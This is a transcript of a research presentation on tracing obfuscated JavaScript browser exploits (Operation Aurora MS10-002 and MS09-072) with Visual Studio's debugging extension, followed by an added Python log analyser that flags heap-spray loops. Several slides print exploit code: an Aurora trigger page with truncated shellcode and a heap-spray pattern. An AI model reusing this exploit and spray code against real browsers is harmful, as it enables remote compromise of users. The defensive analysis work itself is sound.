Jwis2011 ruo ando
Presentation Transcript

  • Analysis of obfuscated JavaScript exploitation using Process Debug Manager
    Ruo Ando, Network Security Institute, National Institute of Information and Communication Technology, Tokyo, Japan
  • Introduction: towards an alternative JavaScript debugger
    • Nowadays JavaScript is everywhere (including Android and Google App Engine) with the spread of JSON (RFC 4627), jQuery (AJAX interface) and so on.
    • Consequently, JavaScript attacks have become sophisticated, with binary-coded attack code and obfuscation by string concatenation, which imposes a great burden on security analysis.
    • Unfortunately, no useful debugger specialized for this kind of JavaScript exploitation exists.
    • In this paper we propose an extension of the Microsoft Visual Studio debugging extension that provides new techniques for tracing JavaScript behavior.
    • The proposed system could extract features of some representative web attacks such as the Google Operation Aurora exploit (MS10-002) and the IE styleObject exploit (MS09-072).
  • The old new thing: impact and memory of the Google Aurora operation, an ultra-sophisticated advanced persistent attack
    • The attack was named "Operation Aurora" by Dmitri Alperovitch, Vice President of Threat Research at the cyber security company McAfee, which informed the White House of this attack in January 2010.
    • Origin: Operation Aurora is a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by Google on January 12, 2010, in a blog post. In the blog post, Google said the attack originated in China.
    • Ultra sophisticated: The attacks were both sophisticated and well resourced and consistent with an advanced persistent threat attack. The attack was aimed at dozens of other organizations, of which Adobe Systems, Juniper Networks and Rackspace have publicly confirmed that they were targeted. According to media reports, Yahoo, Symantec, Northrop Grumman, Morgan Stanley and Dow Chemical were also among the targets.
    • Google and China: As a result of the attack, Google stated in its blog that it plans to operate a completely uncensored version of its search engine in China "within the law, if at all", and acknowledged that if this is not possible it may leave China and close its Chinese offices. Official Chinese media responded stating that the incident is part of a U.S. government conspiracy. The Aurora operation is said to be the Chinese government's attempt to wipe out Google from the mainland.
  • BACKGROUND: the attack vector is very short. But … can we analyze (or debug) this IE exploitation using commodity probes?
      <html><head><script>
      var sc = unescape("%u9090%u19eb%u4b5b%..);
      var sss = Array (826, 679, 798, 224, 770, 427, 819,
                       770, 707, 805, 693, 679, 784, 707, 280,
                       238, 259, 819, 336, 693, 336, 700, 259, 819, 336,
                       224, 770, 427, 770, 322, 805, 819, 686,
                       805, 812, 798, 735, 770, 721, 280, 336, 448, 371);
      var arr = new Array;
      for (var i = 0; i < sss.length; i ++) {
        arr[i] = String.fromCharCode (sss [i] / 7);
      };
      var cc = arr.toString ();
      cc = cc.replace (/,/g, "");
      cc = cc.replace (/@/g, ",");
      eval (cc);
      var x1 = new Array ();
      for (i = 0; i < 200; i ++) {
        x1 [i] = document.createElement ("COMMENT")
        x1 [i].data = "abc";
      };
      var e1 = null;
      function ev1 (evt) {
        e1 = document.createEventObject (evt);
        document.getElementById ("sp1").innerHTML = "";
        window.setInterval (ev2, 50);
      }
      function ev2 ()
      {
        p = "\u0c0d\uu0c0d\u0c0d\u0c0d";
        for (i = 0; i < x1.length; i ++) {
          x1 [i].data = p;
        }
        var t = e1.srcElement;
      }
      </script>
      </head>
      <body>
      <span id="sp1"><IMG SRC="aaa.gif" onload="ev1(event)" width="16" height="16"></span>
      </body>
    It is impossible to trace the script engine's behavior allocating memory and processing the gif!
  • The new old thing: web attacks and JavaScript
    • JavaScript is everywhere (including Android and Google App Engine) with the spread of JSON (RFC 4627), jQuery (AJAX interface) and so on.
    • Unfortunately again, there has been no striking probing (debugging) framework for tracing JavaScript behavior such as the Google Aurora operation described before.
    • In this paper we exploit the debugger extension of Microsoft Visual Studio 2010 (or later) for tracking some famous JavaScript exploits dynamically.
    • Windows OS has a longer history and therefore more mature interfaces to probe JavaScript execution.
    • We can conclude that the Microsoft PDM extension provides a new aspect for analyzing malicious JavaScript.
    • The techniques we have obtained here could be applied to constructing probe modules for other systems such as the Dalvik VM of Android, because JavaScript behavior should be the same regardless of OS (platform) type.
  • A commodity debugger is not always enough! JavaScript and its semantic gap
    • Current popular debugging tools such as OllyDbg and WinDbg are not optimized (or sufficient) for tracing the behavior of web scripting.
    • Semantic gap between the kernel / user mode debugger and the web application execution layer: we can't estimate the event that occurred above from naïve memory and I/O requests.
    • Semantic gap means that a probe running in the user / kernel mode layer lacks knowledge of higher-level events such as a web browser property change.
    [Figure: layers of the semantic gap, top to bottom: malicious JavaScript ("bad thing has happened") → MS Active Scripting Engine (memory allocate, read/write, file I/O request) → user mode debugger (can't understand what is going on from memory and I/O API calls) → MS dynamic link binaries (Jscript.DLL etc.) → native I/O request, IRQ packets → kernel mode debugger]
  • PDM and SDM: an extension of Microsoft Visual Studio 2005 – 2010 and later
    • PDM and SDM are components of the Microsoft Visual Studio debugging extension.
    • PDM and SDM provide a higher-level debugging view, mainly for web scripting such as JavaScript.
    • Process Debug Manager (PDM) is a component that makes all running programs available to a VSPackage (Visual Studio debugger components). Session debug manager (SDM) manages several Debug Engines (DE). A DE uses an expression evaluator and a symbol handler. SDM wraps the IDebugExpression2 interface to obtain a stack frame with the help of the DE by IDebugThread2::EnumFrameInfo.
    • Manage chain: PDM makes the target process available to SDM and DE.
    • By registering with PDM, we can track the function calls of high-level APIs invoked by the web browser. Also, property changes (such as variable substitution) can be logged.
  • Behavior description of JavaScript in this paper
    ① File name:
      r = debugDocument[i]->GetName(DOCUMENTNAMETYPE_URL, &filenameStr[i]);
    ② Function:
      fDesc[i].pdsf->GetDescriptionString(0, &functionStr[i]);
      b2s(functionStr[i], function, BUFLEN);
    ③ Code (substitution):
      debugProperty = funcs->getDebugProperty(f);
      getPropertyInfoRecursive(debugProperty, props, 0);
    ④ Code (loop):
      props->propertyIsChanged(propInfos[i].m_bstrFullName, propInfos[i].m_bstrValue) == TRUE
  • Sample output: www.yahoo.co.jp
      Start Logging On: 2011/02/18 19:16:49
      Process ID:7072                              ← process ID of IE
      MaxDepth 1                                   ← depth of logging
      Process Name:Windows Internet Explorer
      Filename:http://www.yahoo.co.jp/
      Function:JScript global code                 ← function invoked
      window:DispHTMLWindow2:{...}
      err:Object:{...}
      ver:Undefined:undefined
      YAHOO:Undefined:undefined
      d:Undefined:undefined
      $:Undefined:undefined
      14:var ver="ga3_ie"                          ← executed code
      ver:String:"ga3_ie"                          ← property change
      15:if(typeof YAHOO=="undefined"||!YAHOO)     ← executed code
      15:var YAHOO={}                              ← substitute
      YAHOO:Object:{...}
      15:YAHOO.namespace=function(){var a=arguments,b=null,d,e,c;for(d=0;d<a.length;d=d+1){c=(""+a[d]).split(".");b=YAHOO;for(e=(c[0]=="YAHOO")?1:0;e<c.length;e=e+1){b[c[e]]=b[c[e]]||{};b=b[c[e]]}}return b}     ← loop
      ……
  • Proposed system: IE initialization and main loop
    [Figure: Internet Explorer (debuggee) is published by PDM and SDM (VS debugging extension); the main loop runs in IApplicationDebugger::onHandleBreakPoint]
    ① URL: what kinds of URL were accessed?
      hr = sfDesc[i].pdsf->GetCodeContext(&codeContext);
      if(hr!=S_OK){goto out;}
      hr = codeContext->GetDocumentContext(&docContext[i]);
      if(hr!=S_OK){goto out;}
      hr = docContext[i]->GetDocument(&debugDocument[i]);
      if(hr!=S_OK){goto out;}
      hr = debugDocument[i]->GetName(DOCUMENTNAMETYPE_URL,&filenameStr[i]);
    ② Property change:
      ②-1: What kinds of function were invoked?
        sfDesc[i].pdsf->GetDescriptionString(0,&functionStr[i]);
        b2s(functionStr[i],function,BUFLEN);
      ②-2: What kinds of variables changed?
        debugProperty = funcs->getDebugProperty(f);
        getPropertyInfoRecursive(debugProperty,props,0);
  • Two core interfaces of SDM / PDM
    • IRemoteDebugApplication Interface: This registered interface allows the session debug manager (SDM) to obtain information about programs that have been "published" through the IDebugProgramPublisher2 interface. Used outside the debugger: connect, start and stop the debugger.
    • IApplicationDebugger Interface: Represents a running application. It does not need to correspond to an operating-system process. Typically, a debugger targets an application for debugging. The Process Debug Manager typically implements the application object. Used inside the debugger: CauseBreak, handling breakpoints.
  • Publishing IE (1): injecting my callbacks
      hr = PDM->WatchForProviderEvents(
          0,                   // Tell the PDM that we want it to stop watching
          NULL,                // The PDM implementation of this interface does not require the port parameter
          processId,           // the process id to query
          ScriptEngineFilter,  // We are interested in script code
          GUID_NULL,           // no launching engine
          pMyCallback          // callback interface (callbacks to inject)
      );
    IDebugProgramProvider2 methods (method: description):
      GetProviderProcessData: Obtains information about programs running, filtered in a variety of ways.
      GetProviderProgramNode: Gets a program node, given a specific process ID.
      WatchForProviderEvents: Establishes a callback to watch for provider events associated with specific kinds of processes.
      SetLocale: Establishes a locale for any language-specific resources needed by the DE.
  • Publishing IE (2): querying and unmarshaling before launch
      for(DWORD pnode = 0; pnode < procData.ProgramNodes.dwCount; pnode++){
        IDebugProviderProgramNode2 *dppn;
        hr = procData.ProgramNodes.Members[pnode]->QueryInterface(__uuidof(IDebugProviderProgramNode2),(void**)&dppn);   // CHECK 1
        if(hr == S_OK){
          IRemoteDebugApplication *rda;
          hr = dppn->UnmarshalDebuggeeInterface(__uuidof(IRemoteDebugApplication),(void**)&rda);   // CHECK 2
          if(hr == S_OK){
            procList[numScriptProcs] = processes[cp];
            applicationDebugger[numScriptProcs] = new JSLogApplicationDebugger(processId.ProcessId.dwProcessId, rda, maxDepth, maxStack, checkGlobal);
            applicationDebugger[numScriptProcs]->startDebugging();
            numScriptProcs++;
          }
        }
      }
    CHECK 1, QueryInterface: inspects whether the object (IE in this case) supports a certain COM interface. If this method returns S_OK, the Windows OS increments the object reference count and the application can use the interface.
    CHECK 2, UnmarshalDebuggeeInterface: obtains a specified interface across process boundaries. This method is used when the debug engine is running in the Visual Studio process space and the program being debugged is running in its own process space.
    OK. Start the debugger using the IRemoteDebugApplication interface.
  • Two core interfaces of proposed system: active script debugger interface
    • IRemoteDebugApplication Interface for connect / start / stop debugger of IE
      IRemoteDebugApplication::ResumeFromBreakPoint: Continues an application that is currently in a breakpoint.
      IRemoteDebugApplication::CauseBreak: Causes the application to break into the debugger at the earliest opportunity.
      IRemoteDebugApplication::ConnectDebugger: Connects a debugger to this application.
      IRemoteDebugApplication::DisconnectDebugger: Disconnects the current debugger from the application.
      IRemoteDebugApplication::GetDebugger: Returns the current debugger connected to the application.
      IRemoteDebugApplication::CreateInstanceAtApplication: Provides a mechanism for the debugger IDE, running out-of-process to the application, to create objects in the application process.
      IRemoteDebugApplication::QueryAlive: Indicates if the application is responsive.
      IRemoteDebugApplication::EnumThreads: Enumerates all threads known to be associated with the application.
      IRemoteDebugApplication::GetName: Returns the name of this application node.
      IRemoteDebugApplication::GetRootNode: Returns the application node under which all nodes associated with the application are added.
      IRemoteDebugApplication::EnumGlobalExpressionContexts: Enumerates the global expression contexts for all languages running in this application.
  • Two core interfaces of proposed system: active script debugger interface
    • IDebugApplication Interface for cause/handle breakpoint of IE (method: description)
      IDebugProgramProvider2::GetProviderProcessData: Obtains information about programs running, filtered in a variety of ways.
      IDebugProgramProvider2::GetProviderProgramNode: Gets a program node, given a specific process ID.
      IDebugProgramProvider2::WatchForProviderEvents: Establishes a callback to watch for provider events associated with specific kinds of processes.
      IDebugProgramProvider2::SetLocale: Establishes a locale for any language-specific resources needed by the DE.
    Visual Studio Debugging Extensibility: http://msdn.microsoft.com/en-US/library/bb147088%28v=VS.80%29.aspx
  • Property change detection in the main loop: digging stack frames online
    Inspecting stack frames:
    ① Get function name
      sfDesc[i].pdsf->GetDescriptionString(0,&functionStr[i]);
    ② Get file and URL
      IDebugCodeContext* codeContext;
      hr = sfDesc[i].pdsf->GetCodeContext(&codeContext);
    ③ Get property change
      debugProperty = funcs->getDebugProperty(f);
      getPropertyInfoRecursive(debugProperty, props, 0);
    Structures used:
      typedef struct tagDebugStackFrameDescriptor {
        IDebugStackFrame *pdsf;
        DWORD_PTR dwMin;
        DWORD_PTR dwLim;
        BOOL fFinal;
        IUnknown *punkFinal;
      } DebugStackFrameDescriptor;

      typedef struct DebugPropertyInfo {
        DBGPROP_INFO_FLAGS dwValidFields;
        BSTR bstrName;
        BSTR bstrType;
        BSTR bstrValue;
        BSTR bstrFullName;
        DBGPROP_ATTRIB_FLAGS dwAttrib;
        IDebugProperty* pDebugProp;
      };
    IDebugStackFrame methods: GetCodeContext, GetDescriptionString, GetLanguageString, GetThread
  • Experiment
    ① Google Aurora Attack (MS10-002 HTML object memory corruption)
      MS10-002 is an HTML object memory corruption, known as the Google Aurora attack. This cyberattack began in mid-2009 and was first publicly disclosed by Google in January by a blog post. The attack was also named "Operation Aurora" by Dmitri Alperovitch. McAfee Labs discovered that "Aurora" was included in a file path on the attacker's machine.
      • MSB-MS10-002
      • CVE-2010-0249
      • OSVDB-61697
    ② Active Directory Federation Service Attack (MS09-072 ATL headers vulnerability)
      MS09-072 is a vulnerability of Internet Explorer which affects Microsoft Active Directory Federation Service (ADFS). In MS07-072, an ActiveX control built with Microsoft Active Template Library (ATL) headers could allow an adversary to execute remote code. The ATL vulnerability prompted an out-of-band release earlier this year from Microsoft.
      • MSB-MS09-072
      • CVE-2009-3672
      • OSVDB-50622
      • BID-37085
  • Experiment: Google Aurora Attack
      1: Start Logging On: 2011/05/30 23:13:54
      2: Process ID:3652
      3: MaxDepth 2
      4: Process Name:Windows Internet Explorer
      5: Filename:
      6: Function:JScript global code
      7: window:DispHTMLWindow2:{...}
      8: window.clientInformation:Object:{...}
      9: --- snip ---
      10: window.event:IHTMLEventObj:null
      11: window.external:Object:{...}
      12: window.frameElement:IHTMLFrameBase:null
      13: window.window:DispHTMLWindow2:{...}
      14: pNrDlDURxbASLo:Undefined:undefined
      15: OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl:Undefined:undefined
      16: CLLFyYpDX:Undefined:undefined                          ← payload
      17: HBohOxVqidZHilqXmLPfqaMYiv:Undefined:undefined
      18: 5:var pNrDlDURxbASLo = 0c053e66...
      19: pNrDlDURxbASLo:String:"0c053e66..."
      20: 6:var OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl =
      21: OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl:String:"[s]"
      22: 7:i = 0
      23: i:Number:0                                             ← anomaly loop detected!
      24: 7:i<pNrDlDURxbASLo.length
      25: 8:OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl +=                   ← exploit or heap spray?
      26: String.fromCharCode
      27: (parseInt(pNrDlDURxbASLo.substring(i, i+2), 16))
      28: OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl:String:"[s][s]"
      29: 7:i+=2
      30: i:Number:2
      31: 7:i<pNrDlDURxbASLo.length
      32: 8:OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl +=
      33: String.fromCharCode
      34: (parseInt(pNrDlDURxbASLo.substring(i, i+2), 16))
      35: OEJkQgrKoGXtKSVTgyyRcGTmCnvRxUl:String:"[s][s][s]"
    Heap spray pattern shown beside the log:
      var n=unescape("%u0c0d%u0c0d");
      while(n.length<=524288) n+=n;
      n=n.substring(0,524269-sc.length);
      var x=new Array();
      for(var i=0;i<200;i++) {x[i]=n+sc;}
  • Experiment: MS09-072
      1: Start Logging On: 2011/05/31 00:18:46
      2: Process ID:688
      3: MaxDepth 2
      4: Process Name:Windows Internet Explorer
      5: Filename:
      6: Function:JScript - onload function
      7: 20:sFsSfxRecSIXauNmBnB()
      8: Function:sFsSfxRecSIXauNmBnB
      9: DRBfZcPV:Undefined:undefined                            ← payload?
      10: AcHKfoIb:Undefined:undefined
      14: 6:var DRBfZcPV = unescape
      15: DRBfZcPV:Object:{...}
      16: 7:var AcHKfoIb =DRBfZcPV(%u350d%ufc03%u747a%u4976%u2593%f9f% )
      17: AcHKfoIb:String:"*******"
      18: 8:var OSGwFEcn =
      19: DRBfZcPV( "%"+"u"+"0"+"c"+"0"+"c"+"%u"+"0")
      20: OSGwFEcn:String:"**"
      21: 9:var pGgrrYDr = 20 + AcHKfoIb.length
      22: pGgrrYDr:Number:520
      23: 10:while (OSGwFEcn.length < pGgrrYDr)
      24: 10:OSGwFEcn +=OSGwFEcn                                  ← anomaly loop detected!
      25: OSGwFEcn:String:"****"
      26: 10:while (OSGwFEcn.length < pGgrrYDr)                  ← malicious code is scanning memory …
      27: 10:OSGwFEcn+=OSGwFEcn
      28: OSGwFEcnn:String:"********"
      29: 10:while (OSGwFEcn.length < pGgrrYDr)
      30: 10:OSGwFEcn+=OSGwFEcn
      31: OSGwFEcn:String:"******************"
      32: 10:while (OSGwFEcn.length < pGgrrYDr)
      33: 10:OSGwFEcn+=OSGwFEcn
      34: OSGwFEcn:String:"**********************************"
  • Conclusion and further works
    Writing an alternative JavaScript debugger is an exciting challenge! It works partly now.
    • JavaScript is everywhere (including Android and Google App Engine) with the spread of JSON (RFC 4627), jQuery (AJAX interface) and so on.
    • However, and as further work: there has been no striking probing (debugging) framework for tracing JavaScript behavior.
    • In this paper we exploit the Microsoft Visual Studio 2010 (or later) debugging extension for tracking some famous JavaScript exploits dynamically.
    Extensibility for other operating systems and platforms
    • Windows OS is the shortest path to understanding JavaScript behavior. Windows has a longer history and therefore more mature interfaces to probe JavaScript execution. The techniques obtained here could be applied to constructing probe modules for other systems such as the Dalvik VM of Android, because JavaScript behavior should be the same regardless of OS (platform) type.
    IT IS NOT ENOUGH: a memory dump is necessary eventually. Idea: anomaly loop detection of JavaScript + active memory monitoring by DLL injection etc.
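The "anomaly loop detection" named in the conclusion, as an added example that is not part of the paper's PDM logger: a Python post-processor for the logger's own text format (the `srcline:code` and `name:Type:value` lines shown in the Aurora and MS09-072 experiments above). It flags source lines that are re-entered repeatedly, String properties whose length keeps doubling across iterations (the `x += x` growth seen in the MS09-072 trace), `%u`-encoded data being decoded, and `unescape` being aliased to another name (`var DRBfZcPV = unescape`). The log below is constructed, not a real capture; the variable names, the `example.test` URL and the thresholds are assumptions.

```python
import re
from collections import Counter, defaultdict

# Constructed log in the logger's own line formats (not a real capture):
#   "<srcline>:<code>"        executed source line
#   "<name>:<Type>:<value>"   property change (the logger masks String values)
#   anything else             session metadata
SAMPLE_LOG = """\
Start Logging On: 2011/05/31 00:18:46
Process ID:688
Filename:http://example.test/page.html
Function:JScript - onload function
20:runStage()
Function:runStage
dec:Undefined:undefined
spray:Undefined:undefined
6:var dec = unescape
dec:Object:{...}
7:var sc = dec("%u350d%ufc03%u747a%u4976")
sc:String:"****"
8:var spray = dec("%u0c0c%u0c0c")
spray:String:"**"
9:var want = 20 + sc.length
want:Number:24
10:while (spray.length < want)
10:spray += spray
spray:String:"****"
10:while (spray.length < want)
10:spray += spray
spray:String:"********"
10:while (spray.length < want)
10:spray += spray
spray:String:"****************"
10:while (spray.length < want)
10:spray += spray
spray:String:"********************************"
11:var done = 1
done:Number:1
"""

CODE_RE = re.compile(r"^(\d+):(.*)$")
PROP_RE = re.compile(r"^([\w$.]+):([\w$]+):(.*)$")
META_PREFIXES = ("Start Logging", "Process ", "MaxDepth", "Filename:", "Function:")
UNESCAPE_ALIAS_RE = re.compile(r"=\s*unescape\s*$")   # "var dec = unescape" with no call
PERCENT_U_RE = re.compile(r"%u[0-9a-fA-F]{4}")


def parse_log(text):
    """Turn logger lines into ('meta', line) / ('code', src, code) / ('prop', name, type, value)."""
    events = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith(META_PREFIXES):
            events.append(("meta", line))
            continue
        m = CODE_RE.match(line)
        if m:
            events.append(("code", int(m.group(1)), m.group(2).strip()))
            continue
        m = PROP_RE.match(line)
        if m:
            events.append(("prop", m.group(1), m.group(2), m.group(3)))
            continue
        events.append(("meta", line))
    return events


def longest_doubling_run(lengths):
    """Longest run of consecutive observations where each length is >= 2x the previous one."""
    best = run = 0
    for prev, cur in zip(lengths, lengths[1:]):
        run = run + 1 if prev > 0 and cur >= 2 * prev else 0
        best = max(best, run)
    return best


def analyze(events, loop_threshold=3, doubling_threshold=3):
    """Return (loops, lengths, alerts): back-edge counts per source line,
    observed lengths per String variable, and human-readable alerts."""
    loops = Counter()             # source line -> times it was re-entered
    lengths = defaultdict(list)   # String variable -> lengths seen over time
    alerts = []
    prev_src = None
    for ev in events:
        if ev[0] == "meta":
            if ev[1].startswith("Function:"):
                prev_src = None   # new frame: line numbers restart, not a loop
            continue
        if ev[0] == "code":
            _, src, code = ev
            # a source line that does not advance is a back-edge, i.e. a loop iteration
            if prev_src is not None and src <= prev_src:
                loops[src] += 1
            prev_src = src
            if UNESCAPE_ALIAS_RE.search(code):
                alerts.append(f"line {src}: unescape aliased to another name ({code})")
            elif PERCENT_U_RE.search(code):
                alerts.append(f"line {src}: %u-encoded data decoded ({code})")
            continue
        _, name, typ, value = ev
        if typ == "String":
            lengths[name].append(len(value.strip('"')))
    for src, n in sorted(loops.items()):
        if n >= loop_threshold:
            alerts.append(f"line {src}: re-executed {n} times (anomaly loop)")
    for name, seq in lengths.items():
        run = longest_doubling_run(seq)
        if run >= doubling_threshold:
            alerts.append(f"{name}: length doubled {run} times in a row "
                          f"({seq[0]} -> {seq[-1]} chars), heap-spray-like growth")
    return loops, lengths, alerts


if __name__ == "__main__":
    for alert in analyze(parse_log(SAMPLE_LOG))[2]:
        print(alert)
```

The back-edge counter is reset on every `Function:` line because a call into a lower-numbered line of another function is not a loop; the growth check works on string lengths only, so it is unaffected by the logger masking String values with asterisks.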